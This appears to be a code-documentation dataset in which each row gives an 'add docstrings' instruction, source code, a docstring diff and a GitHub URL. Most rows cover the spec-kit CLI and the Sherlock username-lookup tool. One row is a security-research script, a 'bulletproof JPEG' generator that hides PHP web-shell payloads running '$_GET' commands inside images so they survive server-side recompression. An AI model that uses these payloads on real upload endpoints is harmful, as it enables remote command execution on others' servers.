+ specify init --here --ai gemini --ai-skills
+ specify init my-project --ai generic --ai-commands-dir .myagent/commands/ # Unsupported agent
+ specify init my-project --ai claude --preset healthcare-compliance # With preset
+ """
show_banner()
@@ -1716,6 +1873,7 @@
@app.command()
def check():
+ """Check that all required tools are installed."""
show_banner()
console.print("[bold]Checking for installed tools...[/bold]\n")
@@ -1759,6 +1917,7 @@
@app.command()
def version():
+ """Display version and system information."""
import platform
import importlib.metadata
@@ -1868,6 +2027,7 @@
def get_speckit_version() -> str:
+ """Get current spec-kit version."""
import importlib.metadata
try:
return importlib.metadata.version("specify-cli")
@@ -1892,6 +2052,7 @@
@preset_app.command("list")
def preset_list():
+ """List installed presets."""
from .presets import PresetManager
project_root = Path.cwd()
@@ -1931,6 +2092,7 @@ dev: str = typer.Option(None, "--dev", help="Install from local directory (development mode)"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
+ """Install a preset."""
from .presets import (
PresetManager,
PresetCatalog,
@@ -2035,6 +2197,7 @@ def preset_remove(
pack_id: str = typer.Argument(..., help="Preset ID to remove"),
):
+ """Remove an installed preset."""
from .presets import PresetManager
project_root = Path.cwd()
@@ -2064,6 +2227,7 @@ tag: str = typer.Option(None, "--tag", help="Filter by tag"),
author: str = typer.Option(None, "--author", help="Filter by author"),
):
+ """Search for presets in the catalog."""
from .presets import PresetCatalog, PresetError
project_root = Path.cwd()
@@ -2100,6 +2264,7 @@ def preset_resolve(
template_name: str = typer.Argument(..., help="Template name to resolve (e.g., spec-template)"),
):
+ """Show which template will be resolved for a given name."""
from .presets import PresetResolver
project_root = Path.cwd()
@@ -2125,6 +2290,7 @@ def preset_info(
pack_id: str = typer.Argument(..., help="Preset ID to get info about"),
):
+ """Show detailed information about a preset."""
from .extensions import normalize_priority
from .presets import PresetCatalog, PresetManager, PresetError
@@ -2199,6 +2365,7 @@ pack_id: str = typer.Argument(help="Preset ID"),
priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
+ """Set the resolution priority of an installed preset."""
from .presets import PresetManager
project_root = Path.cwd()
@@ -2250,6 +2417,7 @@
@preset_catalog_app.command("list")
def preset_catalog_list():
+ """List all active preset catalogs."""
from .presets import PresetCatalog, PresetValidationError
project_root = Path.cwd()
@@ -2318,6 +2486,7 @@ ),
description: str = typer.Option("", "--description", help="Description of the catalog"),
):
+ """Add a catalog to .specify/preset-catalogs.yml."""
from .presets import PresetCatalog, PresetValidationError
project_root = Path.cwd()
@@ -2382,6 +2551,7 @@ def preset_catalog_remove(
name: str = typer.Argument(help="Catalog name to remove"),
):
+ """Remove a catalog from .specify/preset-catalogs.yml."""
project_root = Path.cwd()
specify_dir = project_root / ".specify"
@@ -2429,6 +2599,20 @@ command_name: str = "command",
allow_not_found: bool = False,
) -> tuple[Optional[str], Optional[str]]:
+ """Resolve an extension argument (ID or display name) to an installed extension.
+
+ Args:
+ argument: Extension ID or display name provided by user
+ installed_extensions: List of installed extension dicts from manager.list_installed()
+ command_name: Name of the command for error messages (e.g., "enable", "disable")
+ allow_not_found: If True, return (None, None) when not found instead of raising
+
+ Returns:
+ Tuple of (extension_id, display_name), or (None, None) if allow_not_found=True and not found
+
+ Raises:
+ typer.Exit: If extension not found (and allow_not_found=False) or name is ambiguous
+ """
from rich.table import Table
# First, try exact ID match
@@ -2471,6 +2655,19 @@ catalog,
command_name: str = "info",
) -> tuple[Optional[dict], Optional[Exception]]:
+ """Resolve an extension argument (ID or display name) from the catalog.
+
+ Args:
+ argument: Extension ID or display name provided by user
+ catalog: ExtensionCatalog instance
+ command_name: Name of the command for error messages
+
+ Returns:
+ Tuple of (extension_info, catalog_error)
+ - If found: (ext_info_dict, None)
+ - If catalog error: (None, error)
+ - If not found: (None, None)
+ """
from rich.table import Table
from .extensions import ExtensionError
@@ -2521,6 +2718,7 @@ available: bool = typer.Option(False, "--available", help="Show available extensions from catalog"),
all_extensions: bool = typer.Option(False, "--all", help="Show both installed and available"),
):
+ """List installed extensions."""
from .extensions import ExtensionManager
project_root = Path.cwd()
@@ -2561,6 +2759,7 @@
@catalog_app.command("list")
def catalog_list():
+ """List all active extension catalogs."""
from .extensions import ExtensionCatalog, ValidationError
project_root = Path.cwd()
@@ -2629,6 +2828,7 @@ ),
description: str = typer.Option("", "--description", help="Description of the catalog"),
):
+ """Add a catalog to .specify/extension-catalogs.yml."""
from .extensions import ExtensionCatalog, ValidationError
project_root = Path.cwd()
@@ -2693,6 +2893,7 @@ def catalog_remove(
name: str = typer.Argument(help="Catalog name to remove"),
):
+ """Remove a catalog from .specify/extension-catalogs.yml."""
project_root = Path.cwd()
specify_dir = project_root / ".specify"
@@ -2738,6 +2939,7 @@ from_url: Optional[str] = typer.Option(None, "--from", help="Install from custom URL"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
+ """Install an extension."""
from .extensions import ExtensionManager, ExtensionCatalog, ExtensionError, ValidationError, CompatibilityError
project_root = Path.cwd()
@@ -2880,6 +3082,7 @@ keep_config: bool = typer.Option(False, "--keep-config", help="Don't remove config files"),
force: bool = typer.Option(False, "--force", help="Skip confirmation"),
):
+ """Uninstall an extension."""
from .extensions import ExtensionManager
project_root = Path.cwd()
@@ -2937,6 +3140,7 @@ author: Optional[str] = typer.Option(None, "--author", help="Filter by author"),
verified: bool = typer.Option(False, "--verified", help="Show only verified extensions"),
):
+ """Search for available extensions in catalog."""
from .extensions import ExtensionCatalog, ExtensionError
project_root = Path.cwd()
@@ -3020,6 +3224,7 @@ def extension_info(
extension: str = typer.Argument(help="Extension ID or name"),
):
+ """Show detailed information about an extension."""
from .extensions import ExtensionCatalog, ExtensionManager, normalize_priority
project_root = Path.cwd()
@@ -3109,6 +3314,7 @@
def _print_extension_info(ext_info: dict, manager):
+ """Print formatted extension info from catalog data."""
from .extensions import normalize_priority
# Header
@@ -3210,6 +3416,7 @@ def extension_update(
extension: str = typer.Argument(None, help="Extension ID or name to update (or all)"),
):
+ """Update extension(s) to latest version."""
from .extensions import (
ExtensionManager,
ExtensionCatalog,
@@ -3612,6 +3819,7 @@ def extension_enable(
extension: str = typer.Argument(help="Extension ID or name to enable"),
):
+ """Enable a disabled extension."""
from .extensions import ExtensionManager, HookExecutor
project_root = Path.cwd()
@@ -3659,6 +3867,7 @@ def extension_disable(
extension: str = typer.Argument(help="Extension ID or name to disable"),
):
+ """Disable an extension without removing it."""
from .extensions import ExtensionManager, HookExecutor
project_root = Path.cwd()
@@ -3709,6 +3918,7 @@ extension: str = typer.Argument(help="Extension ID or name"),
priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
+ """Set the resolution priority of an installed extension."""
from .extensions import ExtensionManager
project_root = Path.cwd()
@@ -3758,4 +3968,4 @@ app()
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/__init__.py |
Add docstrings that explain logic | #!/usr/bin/python
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import range
import struct,sys,os
import gd
from io import StringIO
from random import randint,shuffle
from time import time
# image width/height (square)
N = 32
def insertPayload(_in, _out, payload,off):
img = _in
# look for 'FF DA' (SOS)
sos = img.index("\xFF\xDA")
sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
sod = sos_size+2
# look for 'FF D9' (EOI)
eoi = img[sod:].index("\xFF\xD9")
# enough size ?
if (eoi - sod - off)>=len(payload):
_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
return True
else:
return False
if __name__=='__main__':
print("[+] Virtualabs' Nasty bulletproof Jpeg generator")
print(" | website: http://virtualabs.fr")
print(" | contact: virtualabs -at- gmail -dot- com")
print("")
payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
# make sure the exploit-jpg directory exists or create it
if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
print("[!] Please remove the file named 'exploit-jpg' from the current directory")
elif not os.path.exists('exploit-jpg'):
os.mkdir('exploit-jpg')
# start generation
print('[i] Generating ...')
for q in list(range(50,100))+[-1]:
# loop over every payload
for p in payloads:
# not done yet
done = False
start = time()
# loop while not done and timeout not reached
while not done and (time()-start)<10.0:
# we create a NxN pixels image, true colors
img = gd.image((N,N),True)
# we create a palette
pal = []
for i in range(N*N):
pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
# we shuffle this palette
shuffle(pal)
# and fill the image with it
pidx = 0
for x in range(N):
for y in range(N):
img.setPixel((x,y),pal[pidx])
pidx+=1
# write down the image
out_jpg = StringIO('')
img.writeJpeg(out_jpg,q)
out_raw = out_jpg.getvalue()
# now, we try to insert the payload various ways
for i in range(64):
test_jpg = StringIO('')
if insertPayload(out_raw,test_jpg,p,i):
try:
# write down the new jpeg file
f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
f.write(test_jpg.getvalue())
f.close()
# load it with GD
test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
final_jpg = StringIO('')
test.writeJpeg(final_jpg,q)
final_raw = final_jpg.getvalue()
# does it contain our payload ?
if p in final_raw:
# Yay !
print('[i] Jpeg quality %d ... DONE'%q)
done = True
break
except IOError as e:
pass
else:
break
if not done:
# payload not found, we remove the file
os.unlink('exploit-jpg/exploit-%d.jpg'%q)
else:
break
| --- +++ @@ -1,5 +1,28 @@ #!/usr/bin/python
+"""
+ Bulletproof Jpegs Generator
+ Copyright (C) 2012 Damien "virtualabs" Cauquil
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License along
+ with this program; if not, write to the Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+ -------------
+ # How to use
+ b.php?c=ls
+ Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
+"""
from __future__ import print_function
from future import standard_library
@@ -16,6 +39,9 @@
def insertPayload(_in, _out, payload,off):
+ """
+ Payload insertion (quick JPEG parsing and patching)
+ """
img = _in
# look for 'FF DA' (SOS)
sos = img.index("\xFF\xDA")
| https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Compression/createBulletproofJPG.py |
Improve my code by adding docstrings | from enum import Enum
class QueryStatus(Enum):
CLAIMED = "Claimed" # Username Detected
AVAILABLE = "Available" # Username Not Detected
UNKNOWN = "Unknown" # Error Occurred While Trying To Detect Username
ILLEGAL = "Illegal" # Username Not Allowable For This Site
WAF = "WAF" # Request blocked by WAF (i.e. Cloudflare)
def __str__(self):
return self.value
class QueryResult():
def __init__(self, username, site_name, site_url_user, status,
query_time=None, context=None):
self.username = username
self.site_name = site_name
self.site_url_user = site_url_user
self.status = status
self.query_time = query_time
self.context = context
return
def __str__(self):
status = str(self.status)
if self.context is not None:
# There is extra context information available about the results.
# Append it to the normal response text.
status += f" ({self.context})"
return status | --- +++ @@ -1,7 +1,15 @@+"""Sherlock Result Module
+
+This module defines various objects for recording the results of queries.
+"""
from enum import Enum
class QueryStatus(Enum):
+ """Query Status Enumeration.
+
+ Describes status of query about a given username.
+ """
CLAIMED = "Claimed" # Username Detected
AVAILABLE = "Available" # Username Not Detected
UNKNOWN = "Unknown" # Error Occurred While Trying To Detect Username
@@ -9,11 +17,50 @@ WAF = "WAF" # Request blocked by WAF (i.e. Cloudflare)
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
return self.value
class QueryResult():
+ """Query Result Object.
+
+ Describes result of query about a given username.
+ """
def __init__(self, username, site_name, site_url_user, status,
query_time=None, context=None):
+ """Create Query Result Object.
+
+ Contains information about a specific method of detecting usernames on
+ a given type of web sites.
+
+ Keyword Arguments:
+ self -- This object.
+ username -- String indicating username that query result
+ was about.
+ site_name -- String which identifies site.
+ site_url_user -- String containing URL for username on site.
+ NOTE: The site may or may not exist: this
+ just indicates what the name would
+ be, if it existed.
+ status -- Enumeration of type QueryStatus() indicating
+ the status of the query.
+ query_time -- Time (in seconds) required to perform query.
+ Default of None.
+ context -- String indicating any additional context
+ about the query. For example, if there was
+ an error, this might indicate the type of
+ error that occurred.
+ Default of None.
+
+ Return Value:
+ Nothing.
+ """
self.username = username
self.site_name = site_name
@@ -25,10 +72,18 @@ return
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
status = str(self.status)
if self.context is not None:
# There is extra context information available about the results.
# Append it to the normal response text.
status += f" ({self.context})"
- return status+ return status
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/result.py |
Please document this code using docstrings | #! /usr/bin/env python3
import sys
try:
from sherlock_project.__init__ import import_error_test_var # noqa: F401
except ImportError:
print("Did you run Sherlock with `python3 sherlock/sherlock.py ...`?")
print("This is an outdated method. Please see https://sherlockproject.xyz/installation for up to date instructions.")
sys.exit(1)
import csv
import signal
import pandas as pd
import os
import re
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from json import loads as json_loads
from time import monotonic
from typing import Optional
import requests
from requests_futures.sessions import FuturesSession
from sherlock_project.__init__ import (
__longname__,
__shortname__,
__version__,
forge_api_latest_release,
)
from sherlock_project.result import QueryStatus
from sherlock_project.result import QueryResult
from sherlock_project.notify import QueryNotify
from sherlock_project.notify import QueryNotifyPrint
from sherlock_project.sites import SitesInformation
from colorama import init
from argparse import ArgumentTypeError
class SherlockFuturesSession(FuturesSession):
def request(self, method, url, hooks=None, *args, **kwargs):
# Record the start time for the request.
if hooks is None:
hooks = {}
start = monotonic()
def response_time(resp, *args, **kwargs):
resp.elapsed = monotonic() - start
return
# Install hook to execute when response completes.
# Make sure that the time measurement hook is first, so we will not
# track any later hook's execution time.
try:
if isinstance(hooks["response"], list):
hooks["response"].insert(0, response_time)
elif isinstance(hooks["response"], tuple):
# Convert tuple to list and insert time measurement hook first.
hooks["response"] = list(hooks["response"])
hooks["response"].insert(0, response_time)
else:
# Must have previously contained a single hook function,
# so convert to list.
hooks["response"] = [response_time, hooks["response"]]
except KeyError:
# No response hook was already defined, so install it ourselves.
hooks["response"] = [response_time]
return super(SherlockFuturesSession, self).request(
method, url, hooks=hooks, *args, **kwargs
)
def get_response(request_future, error_type, social_network):
# Default for Response object if some failure occurs.
response = None
error_context = "General Unknown Error"
exception_text = None
try:
response = request_future.result()
if response.status_code:
# Status code exists in response object
error_context = None
except requests.exceptions.HTTPError as errh:
error_context = "HTTP Error"
exception_text = str(errh)
except requests.exceptions.ProxyError as errp:
error_context = "Proxy Error"
exception_text = str(errp)
except requests.exceptions.ConnectionError as errc:
error_context = "Error Connecting"
exception_text = str(errc)
except requests.exceptions.Timeout as errt:
error_context = "Timeout Error"
exception_text = str(errt)
except requests.exceptions.RequestException as err:
error_context = "Unknown Error"
exception_text = str(err)
return response, error_context, exception_text
def interpolate_string(input_object, username):
if isinstance(input_object, str):
return input_object.replace("{}", username)
elif isinstance(input_object, dict):
return {k: interpolate_string(v, username) for k, v in input_object.items()}
elif isinstance(input_object, list):
return [interpolate_string(i, username) for i in input_object]
return input_object
def check_for_parameter(username):
return "{?}" in username
checksymbols = ["_", "-", "."]
def multiple_usernames(username):
allUsernames = []
for i in checksymbols:
allUsernames.append(username.replace("{?}", i))
return allUsernames
def sherlock(
username: str,
site_data: dict[str, dict[str, str]],
query_notify: QueryNotify,
dump_response: bool = False,
proxy: Optional[str] = None,
timeout: int = 60,
) -> dict[str, dict[str, str | QueryResult]]:
# Notify caller that we are starting the query.
query_notify.start(username)
# Normal requests
underlying_session = requests.session()
# Limit number of workers to 20.
# This is probably vastly overkill.
if len(site_data) >= 20:
max_workers = 20
else:
max_workers = len(site_data)
# Create multi-threaded session for all requests.
session = SherlockFuturesSession(
max_workers=max_workers, session=underlying_session
)
# Results from analysis of all sites
results_total = {}
# First create futures for all requests. This allows for the requests to run in parallel
for social_network, net_info in site_data.items():
# Results from analysis of this specific site
results_site = {"url_main": net_info.get("urlMain")}
# Record URL of main site
# A user agent is needed because some sites don't return the correct
# information since they think that we are bots (Which we actually are...)
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0",
}
if "headers" in net_info:
# Override/append any extra headers required by a given site.
headers.update(net_info["headers"])
# URL of user on site (if it exists)
url = interpolate_string(net_info["url"], username.replace(' ', '%20'))
# Don't make request if username is invalid for the site
regex_check = net_info.get("regexCheck")
if regex_check and re.search(regex_check, username) is None:
# No need to do the check at the site: this username is not allowed.
results_site["status"] = QueryResult(
username, social_network, url, QueryStatus.ILLEGAL
)
results_site["url_user"] = ""
results_site["http_status"] = ""
results_site["response_text"] = ""
query_notify.update(results_site["status"])
else:
# URL of user on site (if it exists)
results_site["url_user"] = url
url_probe = net_info.get("urlProbe")
request_method = net_info.get("request_method")
request_payload = net_info.get("request_payload")
request = None
if request_method is not None:
if request_method == "GET":
request = session.get
elif request_method == "HEAD":
request = session.head
elif request_method == "POST":
request = session.post
elif request_method == "PUT":
request = session.put
else:
raise RuntimeError(f"Unsupported request_method for {url}")
if request_payload is not None:
request_payload = interpolate_string(request_payload, username)
if url_probe is None:
# Probe URL is normal one seen by people out on the web.
url_probe = url
else:
# There is a special URL for probing existence separate
# from where the user profile normally can be found.
url_probe = interpolate_string(url_probe, username)
if request is None:
if net_info["errorType"] == "status_code":
# In most cases when we are detecting by status code,
# it is not necessary to get the entire body: we can
# detect fine with just the HEAD response.
request = session.head
else:
# Either this detect method needs the content associated
# with the GET response, or this specific website will
# not respond properly unless we request the whole page.
request = session.get
if net_info["errorType"] == "response_url":
# Site forwards request to a different URL if username not
# found. Disallow the redirect so we can capture the
# http status from the original URL request.
allow_redirects = False
else:
# Allow whatever redirect that the site wants to do.
# The final result of the request will be what is available.
allow_redirects = True
# This future starts running the request in a new thread, doesn't block the main thread
if proxy is not None:
proxies = {"http": proxy, "https": proxy}
future = request(
url=url_probe,
headers=headers,
proxies=proxies,
allow_redirects=allow_redirects,
timeout=timeout,
json=request_payload,
)
else:
future = request(
url=url_probe,
headers=headers,
allow_redirects=allow_redirects,
timeout=timeout,
json=request_payload,
)
# Store future in data for access later
net_info["request_future"] = future
# Add this site's results into final dictionary with all the other results.
results_total[social_network] = results_site
# Open the file containing account links
for social_network, net_info in site_data.items():
# Retrieve results again
results_site = results_total.get(social_network)
# Retrieve other site information again
url = results_site.get("url_user")
status = results_site.get("status")
if status is not None:
# We have already determined the user doesn't exist here
continue
# Get the expected error type
error_type = net_info["errorType"]
if isinstance(error_type, str):
error_type: list[str] = [error_type]
# Retrieve future and ensure it has finished
future = net_info["request_future"]
r, error_text, exception_text = get_response(
request_future=future, error_type=error_type, social_network=social_network
)
# Get response time for response of our request.
try:
response_time = r.elapsed
except AttributeError:
response_time = None
# Attempt to get request information
try:
http_status = r.status_code
except Exception:
http_status = "?"
try:
response_text = r.text.encode(r.encoding or "UTF-8")
except Exception:
response_text = ""
query_status = QueryStatus.UNKNOWN
error_context = None
# As WAFs advance and evolve, they will occasionally block Sherlock and
# lead to false positives and negatives. Fingerprints should be added
# here to filter results that fail to bypass WAFs. Fingerprints should
# be highly targetted. Comment at the end of each fingerprint to
# indicate target and date fingerprinted.
WAFHitMsgs = [
r'.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark', # 2024-05-13 Cloudflare
r'<span id="challenge-error-text">', # 2024-11-11 Cloudflare error page
r'AwsWafIntegration.forceRefreshToken', # 2024-11-11 Cloudfront (AWS)
r'{return l.onPageView}}),Object.defineProperty(r,"perimeterxIdentifiers",{enumerable:' # 2024-04-09 PerimeterX / Human Security
]
if error_text is not None:
error_context = error_text
elif any(hitMsg in r.text for hitMsg in WAFHitMsgs):
query_status = QueryStatus.WAF
else:
if any(errtype not in ["message", "status_code", "response_url"] for errtype in error_type):
error_context = f"Unknown error type '{error_type}' for {social_network}"
query_status = QueryStatus.UNKNOWN
else:
if "message" in error_type:
# error_flag True denotes no error found in the HTML
# error_flag False denotes error found in the HTML
error_flag = True
errors = net_info.get("errorMsg")
# errors will hold the error message
# it can be string or list
# by isinstance method we can detect that
# and handle the case for strings as normal procedure
# and if its list we can iterate the errors
if isinstance(errors, str):
# Checks if the error message is in the HTML
# if error is present we will set flag to False
if errors in r.text:
error_flag = False
else:
# If it's list, it will iterate all the error message
for error in errors:
if error in r.text:
error_flag = False
break
if error_flag:
query_status = QueryStatus.CLAIMED
else:
query_status = QueryStatus.AVAILABLE
if "status_code" in error_type and query_status is not QueryStatus.AVAILABLE:
error_codes = net_info.get("errorCode")
query_status = QueryStatus.CLAIMED
# Type consistency, allowing for both singlets and lists in manifest
if isinstance(error_codes, int):
error_codes = [error_codes]
if error_codes is not None and r.status_code in error_codes:
query_status = QueryStatus.AVAILABLE
elif r.status_code >= 300 or r.status_code < 200:
query_status = QueryStatus.AVAILABLE
if "response_url" in error_type and query_status is not QueryStatus.AVAILABLE:
# For this detection method, we have turned off the redirect.
# So, there is no need to check the response URL: it will always
# match the request. Instead, we will ensure that the response
# code indicates that the request was successful (i.e. no 404, or
# forward to some odd redirect).
if 200 <= r.status_code < 300:
query_status = QueryStatus.CLAIMED
else:
query_status = QueryStatus.AVAILABLE
if dump_response:
print("+++++++++++++++++++++")
print(f"TARGET NAME : {social_network}")
print(f"USERNAME : {username}")
print(f"TARGET URL : {url}")
print(f"TEST METHOD : {error_type}")
try:
print(f"STATUS CODES : {net_info['errorCode']}")
except KeyError:
pass
print("Results...")
try:
print(f"RESPONSE CODE : {r.status_code}")
except Exception:
pass
try:
print(f"ERROR TEXT : {net_info['errorMsg']}")
except KeyError:
pass
print(">>>>> BEGIN RESPONSE TEXT")
try:
print(r.text)
except Exception:
pass
print("<<<<< END RESPONSE TEXT")
print("VERDICT : " + str(query_status))
print("+++++++++++++++++++++")
# Notify caller about results of query.
result: QueryResult = QueryResult(
username=username,
site_name=social_network,
site_url_user=url,
status=query_status,
query_time=response_time,
context=error_context,
)
query_notify.update(result)
# Save status of request
results_site["status"] = result
# Save results from request
results_site["http_status"] = http_status
results_site["response_text"] = response_text
# Add this site's results into final dictionary with all of the other results.
results_total[social_network] = results_site
return results_total
def timeout_check(value):
    """Validate the --timeout command line argument.

    Used as the argparse ``type=`` callable for ``--timeout``.

    Keyword Arguments:
    value                  -- String (or number) from the command line giving
                              the time in seconds to wait before timing out
                              a request.

    Return Value:
    Floating point number representing the timeout in seconds.

    Edge cases:
    * Non-numeric input (e.g. "abc") is rejected with ArgumentTypeError so
      argparse shows the custom message instead of its generic
      "invalid timeout_check value" error.
    * Zero and negative values are rejected: a non-positive timeout is
      meaningless for an HTTP request.
    """
    try:
        float_value = float(value)
    except ValueError:
        # float() raises ValueError for non-numeric input; re-raise as
        # ArgumentTypeError so argparse prints our message, not its default.
        raise ArgumentTypeError(
            f"Invalid timeout value: {value}. Timeout must be a positive number."
        ) from None
    if float_value <= 0:
        raise ArgumentTypeError(
            f"Invalid timeout value: {value}. Timeout must be a positive number."
        )
    return float_value
def handler(signal_received, frame):
    """Exit gracefully on SIGINT (CTRL-C) without printing a traceback.

    The signature matches the handler contract required by
    ``signal.signal``; both arguments are accepted but ignored.
    """
    raise SystemExit(0)
def main():
    """Command line entry point for Sherlock.

    Parses the command line arguments, loads the site manifest, runs the
    username queries, and writes any requested reports (txt / csv / xlsx).

    Edge cases handled here:
    * --output combined with --folderoutput is rejected.
    * --output with more than one username is rejected.
    * A --json value that is purely numeric is treated as an upstream pull
      request number and resolved to that PR's data.json.
    * Usernames containing the "{?}" token are expanded into multiple
      variants before querying.

    Return Value:
    Nothing.  Exits the process with status 1 on fatal errors.
    """
    parser = ArgumentParser(
        formatter_class=RawDescriptionHelpFormatter,
        description=f"{__longname__} (Version {__version__})",
    )
    parser.add_argument(
        "--version",
        action="version",
        version=f"{__shortname__} v{__version__}",
        help="Display version information and dependencies.",
    )
    parser.add_argument(
        "--verbose",
        "-v",
        "-d",
        "--debug",
        action="store_true",
        dest="verbose",
        default=False,
        help="Display extra debugging information and metrics.",
    )
    parser.add_argument(
        "--folderoutput",
        "-fo",
        dest="folderoutput",
        help="If using multiple usernames, the output of the results will be saved to this folder.",
    )
    parser.add_argument(
        "--output",
        "-o",
        dest="output",
        help="If using single username, the output of the result will be saved to this file.",
    )
    parser.add_argument(
        "--csv",
        action="store_true",
        dest="csv",
        default=False,
        help="Create Comma-Separated Values (CSV) File.",
    )
    parser.add_argument(
        "--xlsx",
        action="store_true",
        dest="xlsx",
        default=False,
        help="Create the standard file for the modern Microsoft Excel spreadsheet (xlsx).",
    )
    parser.add_argument(
        "--site",
        action="append",
        metavar="SITE_NAME",
        dest="site_list",
        default=[],
        help="Limit analysis to just the listed sites. Add multiple options to specify more than one site.",
    )
    parser.add_argument(
        "--proxy",
        "-p",
        metavar="PROXY_URL",
        action="store",
        dest="proxy",
        default=None,
        help="Make requests over a proxy. e.g. socks5://127.0.0.1:1080",
    )
    parser.add_argument(
        "--dump-response",
        action="store_true",
        dest="dump_response",
        default=False,
        help="Dump the HTTP response to stdout for targeted debugging.",
    )
    parser.add_argument(
        "--json",
        "-j",
        metavar="JSON_FILE",
        dest="json_file",
        default=None,
        help="Load data from a JSON file or an online, valid, JSON file. Upstream PR numbers also accepted.",
    )
    parser.add_argument(
        "--timeout",
        action="store",
        metavar="TIMEOUT",
        dest="timeout",
        type=timeout_check,
        default=60,
        help="Time (in seconds) to wait for response to requests (Default: 60)",
    )
    parser.add_argument(
        "--print-all",
        action="store_true",
        dest="print_all",
        default=False,
        help="Output sites where the username was not found.",
    )
    parser.add_argument(
        "--print-found",
        action="store_true",
        dest="print_found",
        default=True,
        help="Output sites where the username was found (also if exported as file).",
    )
    parser.add_argument(
        "--no-color",
        action="store_true",
        dest="no_color",
        default=False,
        help="Don't color terminal output",
    )
    parser.add_argument(
        "username",
        nargs="+",
        metavar="USERNAMES",
        action="store",
        help="One or more usernames to check with social networks. Check similar usernames using {?} (replace to '_', '-', '.').",
    )
    parser.add_argument(
        "--browse",
        "-b",
        action="store_true",
        dest="browse",
        default=False,
        help="Browse to all results on default browser.",
    )
    parser.add_argument(
        "--local",
        "-l",
        action="store_true",
        default=False,
        help="Force the use of the local data.json file.",
    )
    parser.add_argument(
        "--nsfw",
        action="store_true",
        default=False,
        help="Include checking of NSFW sites from default list.",
    )
    # TODO deprecated in favor of --txt, retained for workflow compatibility, to be removed
    # in future release
    parser.add_argument(
        "--no-txt",
        action="store_true",
        dest="no_txt",
        default=False,
        help="Disable creation of a txt file - WILL BE DEPRECATED",
    )
    parser.add_argument(
        "--txt",
        action="store_true",
        dest="output_txt",
        default=False,
        help="Enable creation of a txt file",
    )
    parser.add_argument(
        "--ignore-exclusions",
        action="store_true",
        dest="ignore_exclusions",
        default=False,
        help="Ignore upstream exclusions (may return more false positives)",
    )
    args = parser.parse_args()
    # If the user presses CTRL-C, exit gracefully without throwing errors
    signal.signal(signal.SIGINT, handler)
    # Check for newer version of Sherlock. If it exists, let the user know about it
    try:
        latest_release_raw = requests.get(forge_api_latest_release, timeout=10).text
        latest_release_json = json_loads(latest_release_raw)
        latest_remote_tag = latest_release_json["tag_name"]
        # Release tags are prefixed with "v" ("v1.2.3"); strip it before
        # comparing against __version__.
        if latest_remote_tag[1:] != __version__:
            print(
                f"Update available! {__version__} --> {latest_remote_tag[1:]}"
                f"\n{latest_release_json['html_url']}"
            )
    except Exception as error:
        # The update check is best-effort; never let it stop a scan.
        print(f"A problem occurred while checking for an update: {error}")
    # Make prompts
    if args.proxy is not None:
        print("Using the proxy: " + args.proxy)
    if args.no_color:
        # Disable color output.
        init(strip=True, convert=False)
    else:
        # Enable color output.
        init(autoreset=True)
    # Check if both output methods are entered as input.
    if args.output is not None and args.folderoutput is not None:
        print("You can only use one of the output methods.")
        sys.exit(1)
    # Check validity for single username output.
    if args.output is not None and len(args.username) != 1:
        print("You can only use --output with a single username")
        sys.exit(1)
    # Create object with all information about sites we are aware of.
    try:
        if args.local:
            # --local: load the bundled data.json and skip upstream exclusions.
            sites = SitesInformation(
                os.path.join(os.path.dirname(__file__), "resources/data.json"),
                honor_exclusions=False,
            )
        else:
            json_file_location = args.json_file
            if args.json_file:
                # If --json parameter is a number, interpret it as a pull request number
                if args.json_file.isnumeric():
                    pull_number = args.json_file
                    pull_url = f"https://api.github.com/repos/sherlock-project/sherlock/pulls/{pull_number}"
                    pull_request_raw = requests.get(pull_url, timeout=10).text
                    pull_request_json = json_loads(pull_request_raw)
                    # Check if it's a valid pull request
                    # (the GitHub API returns a "message" key on errors).
                    if "message" in pull_request_json:
                        print(f"ERROR: Pull request #{pull_number} not found.")
                        sys.exit(1)
                    head_commit_sha = pull_request_json["head"]["sha"]
                    # Point at the data.json from the PR's head commit.
                    json_file_location = f"https://raw.githubusercontent.com/sherlock-project/sherlock/{head_commit_sha}/sherlock_project/resources/data.json"
            sites = SitesInformation(
                data_file_path=json_file_location,
                honor_exclusions=not args.ignore_exclusions,
